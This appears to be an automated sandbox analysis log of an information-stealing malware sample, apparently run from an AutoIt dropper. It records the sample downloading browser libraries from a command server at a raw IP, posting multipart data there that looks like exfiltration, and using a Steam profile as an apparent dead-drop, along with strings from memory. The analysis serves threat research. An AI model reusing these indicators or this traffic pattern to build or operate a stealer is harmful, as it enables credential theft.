                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 131049Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00AF29BA
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: FGQNrbtYCvA.FGQNrbtYCvA
                        Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: 86.23.85.13.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: file.exe, 00000000.00000003.2086397836.00000000026CD000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, Desktops.0.dr, Webster.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: Webster.pif, 0000000B.00000002.3327151135.000000000CA8D000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://5.75.212.60
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/)
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/-
                        Source: Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/Data
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/b
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/df
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/e
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/er
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dll
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/mozglue.dll
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dllG
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dllHA
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dll
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/saenh.dllv
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dll
